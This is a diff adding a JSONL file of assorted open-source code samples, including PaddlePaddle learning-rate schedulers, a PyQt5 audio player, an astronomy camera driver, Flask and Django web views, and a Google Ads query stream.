diff --git "a/4559.jsonl" "b/4559.jsonl" new file mode 100644--- /dev/null +++ "b/4559.jsonl" @@ -0,0 +1,699 @@ +{"seq_id":"641182985","text":"# Given an array of integers and an integer k,\n# find out whether there are two distinct indices i and j in the array such that nums[i] = nums[j] and\n# the absolute difference between i and j is at most k.\n\nclass Solution(object):\n def containsNearbyDuplicate(self, nums, k):\n dic = {}\n for index, value in enumerate(nums):\n if value in dic and abs(index-dic[value]) <= k:\n return True\n else:\n dic[value] = index\n return False","sub_path":"219_contain_duplicate_2.py","file_name":"219_contain_duplicate_2.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"73581238","text":"# Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport math\n\nfrom .. import unique_name\n\n__all__ = [\n 'NoamDecay', 'PiecewiseDecay', 'NaturalExpDecay', 'ExponentialDecay',\n 'InverseTimeDecay', 'PolynomialDecay', 'CosineDecay'\n]\n\n\nclass LearningRateDecay(object):\n \"\"\"\n Base class of learning rate decay\n \"\"\"\n\n def __init__(self, begin=0, step=1, dtype='float32'):\n self.step_num = begin\n self.step_size = step\n self.dtype = dtype\n\n def __call__(self):\n lr = self.step()\n if isinstance(lr, float):\n lr = self.create_lr_var(lr)\n self.step_num += self.step_size\n return lr\n\n def create_lr_var(self, lr):\n from .. import layers\n lr = layers.create_global_var(\n name=unique_name.generate(\"learning_rate\"),\n shape=[1],\n value=float(lr),\n dtype=self.dtype,\n persistable=True)\n return lr\n\n def step(self):\n raise NotImplementedError()\n\n\nclass PiecewiseDecay(LearningRateDecay):\n def __init__(self, boundaries, values, begin, step=1, dtype='float32'):\n super(PiecewiseDecay, self).__init__(begin, step, dtype)\n self.boundaries = boundaries\n self.values = values\n\n self.vars = []\n for value in values:\n self.vars.append(self.create_lr_var(value))\n\n def step(self):\n for i in range(len(self.boundaries)):\n if self.step_num < self.boundaries[i]:\n return self.vars[i]\n return self.vars[len(self.values) - 1]\n\n\nclass NaturalExpDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n decay_steps,\n decay_rate,\n staircase=False,\n begin=0,\n step=1,\n dtype='float32'):\n super(NaturalExpDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.decay_rate = decay_rate\n self.staircase = staircase\n\n def step(self):\n from .. 
import layers\n div_res = self.create_lr_var(self.step_num / self.decay_steps)\n if self.staircase:\n div_res = layers.floor(div_res)\n decayed_lr = self.learning_rate * layers.exp(-1 * self.decay_rate *\n div_res)\n\n return decayed_lr\n\n\nclass ExponentialDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n decay_steps,\n decay_rate,\n staircase=False,\n begin=0,\n step=1,\n dtype='float32'):\n super(ExponentialDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.decay_rate = decay_rate\n self.staircase = staircase\n\n def step(self):\n from .. import layers\n div_res = self.create_lr_var(self.step_num / self.decay_steps)\n if self.staircase:\n div_res = layers.floor(div_res)\n\n decayed_lr = self.learning_rate * (self.decay_rate**div_res)\n\n return decayed_lr\n\n\nclass InverseTimeDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n decay_steps,\n decay_rate,\n staircase=False,\n begin=0,\n step=1,\n dtype='float32'):\n super(InverseTimeDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.decay_rate = decay_rate\n self.staircase = staircase\n\n def step(self):\n from .. import layers\n div_res = self.create_lr_var(self.step_num / self.decay_steps)\n if self.staircase:\n div_res = layers.floor(div_res)\n\n decayed_lr = self.learning_rate / (1 + self.decay_rate * div_res)\n\n return decayed_lr\n\n\nclass PolynomialDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n decay_steps,\n end_learning_rate=0.0001,\n power=1.0,\n cycle=False,\n begin=0,\n step=1,\n dtype='float32'):\n super(PolynomialDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.end_learning_rate = end_learning_rate\n self.power = power\n self.cycle = cycle\n\n def step(self):\n from .. import layers\n tmp_step_num = self.step_num\n tmp_decay_steps = self.decay_steps\n if self.cycle:\n div_res = layers.ceil(\n self.create_lr_var(tmp_step_num / float(self.decay_steps)))\n\n if tmp_step_num == 0:\n div_res = self.create_lr_var(1.0)\n tmp_decay_steps = self.decay_steps * div_res\n else:\n tmp_step_num = self.create_lr_var(tmp_step_num\n if tmp_step_num < self.decay_steps\n else self.decay_steps)\n\n decayed_lr = (self.learning_rate - self.end_learning_rate) * \\\n ((1 - tmp_step_num / tmp_decay_steps) ** self.power) + self.end_learning_rate\n return decayed_lr\n\n\nclass CosineDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n step_each_epoch,\n epochs,\n begin=0,\n step=1,\n dtype='float32'):\n super(CosineDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.step_each_epoch = step_each_epoch\n self.epochs = epochs\n\n def step(self):\n from .. import layers\n cur_epoch = layers.floor(\n self.create_lr_var(self.step_num / self.step_each_epoch))\n decayed_lr = self.learning_rate * 0.5 * (\n layers.cos(cur_epoch * math.pi / self.epochs) + 1)\n return decayed_lr\n\n\nclass NoamDecay(LearningRateDecay):\n def __init__(self, d_model, warmup_steps, begin=1, step=1, dtype='float32'):\n super(NoamDecay, self).__init__(begin, step, dtype)\n self.d_model = d_model\n self.warmup_steps = warmup_steps\n\n def step(self):\n from .. 
import layers\n a = self.create_lr_var(self.step_num**-0.5)\n b = self.create_lr_var((self.warmup_steps**-1.5) * self.step_num)\n lr_value = (self.d_model**-0.5) * layers.elementwise_min(a, b)\n return lr_value\n","sub_path":"python/paddle/fluid/dygraph/learning_rate_scheduler.py","file_name":"learning_rate_scheduler.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"471273249","text":"#!/usr/bin/env python\n#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-\n\nimport os.path as path\nfrom bes.testing.unit_test import unit_test\nfrom bes.build.build_system import build_system\nfrom bes.build.build_target import build_target\nfrom rebuild.toolchain.compiler import compiler\nfrom rebuild.toolchain.toolchain import toolchain\nfrom rebuild.toolchain.toolchain_testing import toolchain_testing\nfrom bes.system.host import host\nfrom bes.fs.file_util import file_util\nfrom bes.fs.temp_file import temp_file\nfrom bes.common.object_util import object_util\nfrom bes.common.variable import variable\nfrom bes.testing.unit_test_function_skip import unit_test_function_skip\n\nclass test_toolchain(unit_test):\n\n DEBUG = False\n #DEBUG = True\n\n CC_SOURCE = r'''\n#include \nint main(int argc, char* argv[])\n{\n printf(\"%s::main()\\n\", __FILE__);\n return 0;\n}\n'''\n\n @unit_test_function_skip.skip_if(not toolchain_testing.can_compile_macos(), 'cannot compile macos')\n def test_compile_cc_macos(self):\n tmp_dir = self._make_temp_dir()\n src = self._make_temp_source(tmp_dir, 'test.c', self.CC_SOURCE)\n cc = self._make_compiler(build_system.MACOS, 'x86_64')\n targets = cc.compile_c(src)\n self.assertEqual( 1, len(targets) )\n self.assertTrue( path.exists(targets[0][1]) )\n\n @unit_test_function_skip.skip_if(not toolchain_testing.can_compile_ios(), 'cannot compile ios')\n def test_compile_cc_ios(self):\n tmp_dir = self._make_temp_dir()\n src = self._make_temp_source(tmp_dir, 'test.c', self.CC_SOURCE)\n cc = self._make_compiler(build_system.IOS, 'arm64')\n targets = cc.compile_c(src)\n self.assertEqual( 1, len(targets) )\n self.assertTrue( path.exists(targets[0][1]) )\n\n @unit_test_function_skip.skip_if(not toolchain_testing.can_compile_android(), 'cannot compile android')\n def test_compile_cc_android(self):\n tmp_dir = self._make_temp_dir()\n src = self._make_temp_source(tmp_dir, 'test.c', self.CC_SOURCE)\n cc = self._make_compiler(build_system.ANDROID, 'armv7')\n targets = cc.compile_c(src)\n self.assertEqual( 1, len(targets) )\n self.assertTrue( path.exists(targets[0][1]) )\n \n @unit_test_function_skip.skip_if(not toolchain_testing.can_compile_linux(), 'cannot compile linux')\n def test_compile_cc_linux(self):\n tmp_dir = self._make_temp_dir()\n src = self._make_temp_source(tmp_dir, 'test.c', self.CC_SOURCE)\n cc = self._make_compiler(build_system.LINUX, host.ARCH)\n targets = cc.compile_c(src)\n self.assertEqual( 1, len(targets) )\n self.assertTrue( path.exists(targets[0][1]) )\n \n @classmethod\n def _make_temp_dir(clazz):\n tmp_dir = temp_file.make_temp_dir(delete = not clazz.DEBUG)\n if clazz.DEBUG:\n print('tmp_dir: %s' % (tmp_dir))\n return tmp_dir\n\n @classmethod\n def _make_temp_source(clazz, tmp_dir, filename, content):\n return file_util.save(path.join(tmp_dir, filename), content = content)\n\n @classmethod\n def _make_compiler(clazz, system, arch):\n return compiler(build_target(system, '', '', '', arch, 'release'))\n\nif __name__ == '__main__':\n 
unit_test.main()\n","sub_path":"tests/lib/rebuild/toolchain/test_toolchain.py","file_name":"test_toolchain.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"42021578","text":"import sys\nimport os\nimport time\nfrom PyQt5.QtCore import QUrl, QTimer\nfrom PyQt5.QtMultimedia import QMediaPlaylist, QMediaPlayer, QMediaContent\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog\nfrom ui_player import Ui_Form\n\n\nclass MyMainForm(QMainWindow, Ui_Form):\n def __init__(self, parent=None):\n super(MyMainForm, self).__init__(parent)\n self.setupUi(self)\n self.initialize()\n\n def initialize(self):\n self.setWindowTitle(\"Love\")\n self.fileName = \"\"\n self.cur_song = ''\n self.is_pause = True\n self.playlist = QMediaPlaylist() # 播放列表\n self.playlist.setPlaybackMode(QMediaPlaylist.Loop) # 列表循环\n self.player = QMediaPlayer(self)\n self.player.setPlaylist(self.playlist)\n\n # 按键\n self.btn_openfile.clicked.connect(lambda: self.btn_openfile_click())\n self.btn_play.clicked.connect(lambda: self.btn_play_click())\n\n # 进度条\n self.slider_time.sliderMoved[int].connect(lambda: self.player.setPosition(self.slider_time.value()))\n\n # 计时器:控制进度条和进度时间\n self.timer = QTimer(self)\n self.timer.start(1000)\n self.timer.timeout.connect(self.player_timer)\n\n def btn_play_click(self):\n if self.is_pause:\n self.is_pause = False\n self.player.play()\n self.btn_play.setText('stop')\n # for debug\n # print('当前播放歌曲: ' + self.cur_song)\n else:\n self.is_pause = True\n self.player.pause()\n self.btn_play.setText('play')\n\n def btn_openfile_click(self):\n self.playlist.clear() # 读取歌曲前,清空playlist\n self.fileName, filetype = QFileDialog.getOpenFileName(self, '选择文件', '', '音频文件 (*.wav)')\n # for debug\n # print('当前歌曲路径:' + self.fileName)\n self.cur_song = os.path.basename(self.fileName)\n self.lab_openfile.setText(self.cur_song)\n # 将音频文件添加到playlist\n self.playlist.addMedia(QMediaContent(QUrl.fromLocalFile(self.fileName)))\n\n # 正在播放音乐时,中断播放\n if self.is_pause is False:\n self.player.pause()\n self.btn_play.setText('play')\n\n # 设置进度条和播放时间\n def player_timer(self):\n self.slider_time.setMinimum(0)\n self.slider_time.setMaximum(self.player.duration())\n self.slider_time.setValue(self.slider_time.value() + 1000)\n\n self.lab_time.setText(time.strftime('%M:%S', time.localtime(self.player.position() / 1000)))\n self.lab_duration.setText(time.strftime('%M:%S', time.localtime(self.player.duration() / 1000)))\n\n # 进度条满了之后回零\n if self.player.duration() == self.slider_time.value():\n self.slider_time.setValue(0)\n\n\nif __name__ == \"__main__\":\n # 固定的,PyQt5程序都需要QApplication对象。sys.argv是命令行参数列表,确保程序可以双击运行\n app = QApplication(sys.argv)\n # 初始化\n myWin = MyMainForm()\n # 将窗口控件显示在屏幕上\n myWin.show()\n # 程序运行,sys.exit方法确保程序完整退出。\n sys.exit(app.exec_())\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"343743146","text":"############################################################\n# -*- coding: utf-8 -*-\n#\n# # # # # # #\n# ## ## # ## # #\n# # # # # # # # # # #\n# # ## # ## ## ######\n# # # # # # #\n#\n# Python-based Tool for interaction with the 10micron mounts\n# GUI with PyQT5 for python\n# Python v3.7.5\n#\n# Michael Würtenberger\n# (c) 2019\n#\n# Licence APL2.0\n#\n###########################################################\n# standard libraries\nimport logging\nimport 
time\nfrom datetime import datetime\n# external packages\nimport PyQt5\nimport numpy as np\nfrom astropy.io import fits\n# local imports\nfrom mw4.base.loggerMW import CustomLogger\nfrom mw4.base.alpacaClass import AlpacaClass\nfrom mw4.base.alpacaBase import Camera\nfrom mw4.base.tpool import Worker\n\n\nclass CameraAlpaca(AlpacaClass):\n \"\"\"\n the class Dome inherits all information and handling of the Dome device. there will be\n some parameters who will define the slewing position of the dome relating to the\n mount.dome = DomeAlpaca(app=None)\n \"\"\"\n\n __all__ = ['CameraAlpaca',\n ]\n\n # specific timing for device\n CYCLE_DEVICE = 3000\n CYCLE_DATA = 1000\n\n def __init__(self, app=None, signals=None, data=None):\n super().__init__(app=app, data=data)\n\n # as we have in the base class only the base client there, we will get more\n # specialized with Dome (which is derived from the base class)\n self.client = Camera()\n self.signals = signals\n self.data = data\n self.imagePath = ''\n\n def getInitialConfig(self):\n \"\"\"\n\n :return: true for test purpose\n \"\"\"\n super().getInitialConfig()\n\n self.dataEntry(self.client.cameraxsize(), 'CCD_INFO.CCD_MAX_X')\n self.dataEntry(self.client.cameraysize(), 'CCD_INFO.CCD_MAX_Y')\n self.dataEntry(self.client.canfastreadout(), 'CAN_FAST')\n # self.dataEntry(self.client.canstopexposure(), 'CAN_ABORT')\n self.dataEntry(self.client.pixelsizex(), 'CCD_INFO.CCD_PIXEL_SIZE_X')\n self.dataEntry(self.client.pixelsizey(), 'CCD_INFO.CCD_PIXEL_SIZE_Y')\n self.dataEntry(self.client.maxbinx(), 'CCD_BINNING.HOR_BIN_MAX')\n self.dataEntry(self.client.maxbiny(), 'CCD_BINNING.VERT_BIN_MAX')\n self.dataEntry(self.client.binx(), 'CCD_BINNING.HOR_BIN')\n self.dataEntry(self.client.biny(), 'CCD_BINNING.VERT_BIN')\n self.dataEntry(self.client.startx(), 'CCD_FRAME.X')\n self.dataEntry(self.client.starty(), 'CCD_FRAME.Y')\n\n return True\n\n def workerPollData(self):\n \"\"\"\n\n :return: true for test purpose\n \"\"\"\n\n self.dataEntry(self.client.camerastate(),\n 'CAMERA.STATE')\n self.dataEntry(self.client.ccdtemperature(),\n 'CCD_TEMPERATURE.CCD_TEMPERATURE_VALUE')\n self.dataEntry(self.client.fastreadout(),\n 'READOUT_QUALITY.QUALITY_LOW',\n 'READOUT_QUALITY.QUALITY_HIGH')\n return True\n\n def pollData(self):\n \"\"\"\n\n :return: success\n \"\"\"\n\n if not self.deviceConnected:\n return False\n\n worker = Worker(self.workerPollData)\n self.threadPool.start(worker)\n return True\n\n def sendDownloadMode(self, fastReadout=False):\n \"\"\"\n setDownloadMode sets the readout speed of the camera\n\n :return: success\n \"\"\"\n\n suc = self.data['CAN_FAST']\n if suc and fastReadout:\n self.client.fastreadout(FastReadout=True)\n quality = 'High' if self.data.get('READOUT_QUALITY.QUALITY_HIGH', True) else 'Low'\n self.log.info(f'camera has readout quality entry: {quality}')\n\n return suc\n\n def workerExpose(self,\n imagePath='',\n expTime=3,\n binning=1,\n fastReadout=True,\n posX=0,\n posY=0,\n width=1,\n height=1,\n ):\n \"\"\"\n\n :param imagePath:\n :param expTime:\n :param binning:\n :param fastReadout:\n :param posX:\n :param posY:\n :param width:\n :param height:\n :return: success\n \"\"\"\n\n self.imagePath = imagePath\n binning = int(binning)\n posX = int(posX)\n posY = int(posY)\n width = int(width)\n height = int(height)\n\n suc = self.sendDownloadMode(fastReadout=fastReadout)\n if not suc:\n self.log.info('Camera has no download quality settings')\n\n # set binning\n self.client.binx(BinX=binning)\n self.client.biny(BinY=binning)\n\n # set 
frame sizes\n self.client.startx(StartX=posX)\n self.client.starty(StartY=posY)\n self.client.numx(NumX=width)\n self.client.numy(NumY=height)\n\n # start exposure\n self.client.startexposure(Duration=expTime, Light=True)\n\n # wait for finishing\n timeLeft = expTime\n while not self.client.imageready():\n text = f'expose {timeLeft:3.0f} s'\n time.sleep(1)\n if timeLeft >= 1:\n timeLeft -= 1\n else:\n timeLeft = 0\n self.signals.message.emit(text)\n self.signals.integrated.emit()\n\n # download image\n self.signals.message.emit('download')\n data = np.array(self.client.imagearray(), dtype=np.uint16)\n data = np.transpose(data)\n\n # creating a fits file and saving the image\n self.signals.message.emit('saving')\n hdu = fits.PrimaryHDU(data=data)\n header = hdu.header\n header['OBJECT'] = 'skymodel'\n header['FRAME'] = 'Light'\n header['EQUINOX'] = 2000\n header['PIXSIZE1'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_X']\n header['PIXSIZE2'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_Y']\n header['XPIXSZ'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_X']\n header['YPIXSZ'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_Y']\n header['SCALE'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_X'] / 570 * 206.265\n header['XBINNING'] = binning\n header['YBINNING'] = binning\n header['EXPTIME'] = expTime\n header['OBSERVER'] = 'MW4'\n header['DATE-OBS'] = self.app.mount.obsSite.timeJD.utc_iso()\n\n if self.app.mainW.deviceStat['mount']:\n header['OBJCTRA'] = self.app.mount.obsSite.raJNow.hstr()\n dec = self.app.mount.obsSite.decJNow.dstr()\n dec = dec.replace('deg', '').replace(\"'\", '').replace('\"', '')\n header['OBJCTDEC'] = dec\n header['RA'] = self.app.mount.obsSite.raJNow.hours\n header['DEC'] = self.app.mount.obsSite.decJNow.degrees\n header['TELESCOP'] = self.app.mount.firmware.product\n\n hdu.writeto(self.imagePath, overwrite=True)\n\n self.signals.message.emit('')\n self.signals.saved.emit(self.imagePath)\n\n return suc\n\n def expose(self,\n imagePath='',\n expTime=3,\n binning=1,\n fastReadout=True,\n posX=0,\n posY=0,\n width=1,\n height=1,\n ):\n \"\"\"\n\n :return: success\n \"\"\"\n\n if not self.deviceConnected:\n return False\n\n worker = Worker(self.workerExpose,\n imagePath=imagePath,\n expTime=expTime,\n binning=binning,\n fastReadout=fastReadout,\n posX=posX,\n posY=posY,\n width=width,\n height=height)\n # worker.signals.result.connect(self.emitStatus)\n self.threadPool.start(worker)\n return True\n\n def abort(self):\n \"\"\"\n abort cancels the exposing\n\n :return: success\n \"\"\"\n\n if not self.deviceConnected:\n return False\n\n canAbort = self.data.get('CAN_ABORT', False)\n if canAbort:\n self.client.stopexposure()\n\n return True\n","sub_path":"mw4/imaging/cameraAlpaca.py","file_name":"cameraAlpaca.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"10220378","text":"#coding: utf-8\n\nfrom . 
import api\nfrom .decorators import admin_required, tojson\nfrom flask import request, jsonify\nfrom restccnu.models import connection, Feedback\n# from restccnu.workers.workers import send_async_mail\n\nADMIN_EMAIL = \"muxistudio@qq.com\"\nMAIL_DEFAULT_SENDER = \"muxistudio@163.com\"\nMAIL_SUBJECT_PREFIX = \"[feedback]\"\n\n# def send_mail(to, subject, template, **kwargs):\n# \"\"\"\n# kwargs: {'feedback', 'contact'}\n# \"\"\"\n# msg = Message(\n# MAIL_SUBJECT_PREFIX+ subject,\n# sender = MAIL_DEFAULT_SENDER,\n# recipients = [to]\n# )\n# msg.html = render_template(template, **kwargs)\n# send_async_email.delay(msg) # delay\n\n\n@api.route('/feedback/', methods=['GET', 'POST'])\ndef ios_post_feedback():\n if request.method == 'POST':\n feedobj = connection.Feedback()\n feedback = request.get_json().get('feedback')\n contact = request.get_json().get('contact')\n # 发邮件服务 => 直接发管理后台\n # send_mail( # a celery async task\n # ADMIN_EMAIL, 'ccnubox~ios: there is a new feedback',\n # 'mail.html',\n # feedback=feedback, contact=contact\n # )\n feedobj['contact'] = contact # 存储用户反馈: 联系方式+反馈信息\n feedobj['feedback'] = feedback\n feedobj.save()\n return jsonify({}), 201\n\n\n@api.route('/feedbacks/', methods=['GET'])\n@admin_required\n@tojson\ndef ios_get_feedback():\n feedbacks_list = []\n feedbacks = connection.Feedback.find()\n for feedback in feedbacks:\n feedbacks_list.append({\n feedback['contact']:feedback['feedback']\n })\n return feedbacks_list\n ","sub_path":"restccnu/apis/ios_feedback.py","file_name":"ios_feedback.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545958271","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n if len(nums) == 0:\n return [[]]\n lis = [[n_i] for n_i in nums]\n temp = lis\n res = temp\n for i in xrange(1,len(nums)):\n temp = [temp_i+lis_i for temp_i in temp for lis_i in lis if temp_i[-1] str:\n \"\"\"\n The primary_key option is disabled. 
Config should not provide the primary key.\n It will be ignored if provided.\n If you need to enable it, uncomment the next line instead of `return None` and modify your config\n \"\"\"\n # return self.custom_query_config.get(\"primary_key\") or None\n return None\n\n @property\n def name(self):\n return self.custom_query_config[\"table_name\"]\n\n def get_query(self, stream_slice: Mapping[str, Any] = None) -> str:\n start_date, end_date = self.get_date_params(stream_slice, self.cursor_field)\n return self.insert_segments_date_expr(self.user_defined_query, start_date, end_date)\n\n # IncrementalGoogleAdsStream uses get_json_schema a lot while parsing\n # responses, caching plaing crucial role for performance here.\n @lru_cache()\n def get_json_schema(self) -> Dict[str, Any]:\n \"\"\"\n Compose json schema based on user defined query.\n :return Dict object representing jsonschema\n \"\"\"\n\n local_json_schema = {\n \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n \"type\": \"object\",\n \"properties\": {},\n \"additionalProperties\": True,\n }\n # full list {'ENUM', 'STRING', 'DATE', 'DOUBLE', 'RESOURCE_NAME', 'INT32', 'INT64', 'BOOLEAN', 'MESSAGE'}\n\n google_datatype_mapping = {\n \"INT64\": \"integer\",\n \"INT32\": \"integer\",\n \"DOUBLE\": \"number\",\n \"STRING\": \"string\",\n \"BOOLEAN\": \"boolean\",\n \"DATE\": \"string\",\n }\n fields = CustomQuery.get_query_fields(self.user_defined_query)\n fields.append(self.cursor_field)\n google_schema = self.google_ads_client.get_fields_metadata(fields)\n\n for field in fields:\n node = google_schema.get(field)\n # Data type return in enum format: \"GoogleAdsFieldDataType.\"\n google_data_type = str(node.data_type).replace(\"GoogleAdsFieldDataType.\", \"\")\n if google_data_type == \"ENUM\":\n field_value = {\"type\": \"string\", \"enum\": list(node.enum_values)}\n elif google_data_type == \"MESSAGE\":\n # Represents protobuf message and could be anything, set custom\n # attribute \"protobuf_message\" to convert it to a string (or\n # array of strings) later.\n # https://developers.google.com/google-ads/api/reference/rpc/v8/GoogleAdsFieldDataTypeEnum.GoogleAdsFieldDataType?hl=en#message\n if node.is_repeated:\n output_type = [\"array\", \"null\"]\n else:\n output_type = [\"string\", \"null\"]\n field_value = {\"type\": output_type, \"protobuf_message\": True}\n else:\n output_type = [google_datatype_mapping.get(google_data_type, \"string\"), \"null\"]\n field_value = {\"type\": output_type}\n if google_data_type == \"DATE\":\n field_value[\"format\"] = \"date\"\n\n local_json_schema[\"properties\"][field] = field_value\n\n return local_json_schema\n\n # Regexp flags for parsing GAQL query\n RE_FLAGS = re.DOTALL | re.MULTILINE | re.IGNORECASE\n # Regexp for getting query columns\n SELECT_EXPR = re.compile(\"select(.*)from\", flags=RE_FLAGS)\n WHERE_EXPR = re.compile(\"where.*\", flags=RE_FLAGS)\n # list of keywords that can come after WHERE clause,\n # according to https://developers.google.com/google-ads/api/docs/query/grammar\n KEYWORDS_EXPR = re.compile(\"(order by|limit|parameters)\", flags=RE_FLAGS)\n\n @staticmethod\n def get_query_fields(query: str) -> List[str]:\n fields = CustomQuery.SELECT_EXPR.search(query)\n if not fields:\n return []\n fields = fields.group(1)\n return [f.strip() for f in fields.split(\",\")]\n\n @staticmethod\n def insert_segments_date_expr(query: str, start_date: str, end_date: str) -> str:\n \"\"\"\n Insert segments.date condition to break query into slices for incremental stream.\n :param query 
Origin user defined query\n :param start_date start date for metric (inclusive)\n :param end_date end date for metric (inclusive)\n :return Modified query with date window condition included\n \"\"\"\n # insert segments.date field\n columns = CustomQuery.SELECT_EXPR.search(query)\n if not columns:\n raise Exception(\"Not valid GAQL expression\")\n columns = columns.group(1)\n new_columns = columns + \", segments.date\\n\"\n result_query = query.replace(columns, new_columns)\n\n # Modify/insert where condition\n where_cond = CustomQuery.WHERE_EXPR.search(result_query)\n if not where_cond:\n # There is no where condition, insert new one\n where_location = len(result_query)\n keywords = CustomQuery.KEYWORDS_EXPR.search(result_query)\n if keywords:\n # where condition is not at the end of expression, insert new condition before keyword begins.\n where_location = keywords.start()\n result_query = (\n result_query[0:where_location]\n + f\"\\nWHERE segments.date BETWEEN '{start_date}' AND '{end_date}'\\n\"\n + result_query[where_location:]\n )\n return result_query\n # There is already where condition, add segments.date expression\n where_cond = where_cond.group(0)\n keywords = CustomQuery.KEYWORDS_EXPR.search(where_cond)\n if keywords:\n # There is some keywords after WHERE condition\n where_cond = where_cond[0 : keywords.start()]\n new_where_cond = where_cond + f\" AND segments.date BETWEEN '{start_date}' AND '{end_date}'\\n\"\n result_query = result_query.replace(where_cond, new_where_cond)\n return result_query\n","sub_path":"airbyte-integrations/connectors/source-google-ads/source_google_ads/custom_query_stream.py","file_name":"custom_query_stream.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449873503","text":"from django.shortcuts import render\nfrom .models import Port, Category, BuildHistory\nimport json\nfrom django.http import HttpResponse\n\ndef index(request):\n alphabet = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n categories = Category.objects.all()\n return render(request, 'ports/index.html', {\n 'alphabet': alphabet,\n 'categories': categories\n })\n\n\ndef categorylist(request, cat):\n ports = Port.objects.filter(categories__name=cat).order_by('id')\n portscount = ports.count()\n return render(request, 'ports/categorylist.html',\n {\n 'ports': ports,\n 'portscount': portscount,\n 'category': cat\n })\n\n\ndef letterlist(request, letter):\n ports = Port.objects.all()\n sortedports = []\n for port in ports:\n firstletter = list(port.name)[0]\n if firstletter.casefold() == letter.casefold():\n sortedports.append(port)\n portscount = len(sortedports)\n\n return render(request, 'ports/letterlist.html',\n {\n 'ports': sortedports,\n 'letter': letter.upper(),\n 'portscount' : portscount\n })\n\n\ndef portdetail(request, name):\n port = Port.objects.get(name=name)\n build_history = BuildHistory.objects.filter(port_name=name).order_by('-time_start')\n build_hsierra = build_history.filter(builder_name=\"10.13_x86_64\")\n build_mojave = build_history.filter(builder_name=\"10.14_x86_64\")\n build_sierra = build_history.filter(builder_name=\"10.12_x86_64\")\n\n status = []\n if build_hsierra:\n status.append(build_hsierra[0])\n if build_mojave:\n status.append(build_mojave[0])\n if build_sierra:\n status.append(build_sierra[0])\n return render(request, 'ports/portdetail.html', {\n 'port': port,\n 'build_history': 
build_history,\n 'status' : status\n })\n\ndef stats(request):\n return render(request, 'ports/stats.html')\n\ndef stats_portdetail(request, name):\n port = Port.objects.get(name=name)\n return render(request, 'ports/stats_portdetail.html',{\n 'port':port,\n })\n\ndef search(request):\n if request.method == 'POST':\n search_text = request.POST['search_text']\n search_results = Port.objects.filter(name__icontains=search_text)[:10]\n has_input = True\n else:\n search_results = Port.objects.none()\n\n return render(request, 'ports/search.html', {\n 'search_results' : search_results,\n 'has_input': has_input\n })\n\n\n\n","sub_path":"ports/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"7757377","text":"#python eval.py p1_valid.txt ../hw4_data/TrimmedVideos/label/gt_test_ans.csv\n#python eval.py p2_result.txt ../hw4_data/TrimmedVideos/label/gt_test_ans.csv\n#python eval.py p2_result.txt ../hw4_data/TrimmedVideos/label/gt_valid.csv\n\nfrom reader import getVideoList\nimport numpy as np\nimport sys\nimport os\n\ntest_predict_path = sys.argv[1]\ntest_label_path = sys.argv[2] #TrimmedVideos/label/gt_valid.csv\n\n# read files\ndict = getVideoList(os.path.join(test_label_path))\nf = open(os.path.join(test_predict_path),'r')\npredict_vals = f.read().splitlines()\n\n# evaluation ans\nprint(\"\\nevaluation ans...\")\npredict_vals = np.array(predict_vals).astype(int)\nprint(\"predict_vals:\\n\",predict_vals)\nlabel_vals = np.array(dict['Action_labels']).astype(int)\nprint(\"label_vals:\\n\",label_vals)\naccuracy = np.mean(predict_vals == label_vals)\nprint(\"accuracy:\",accuracy)\n","sub_path":"hw4_rnn_action_recognition/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 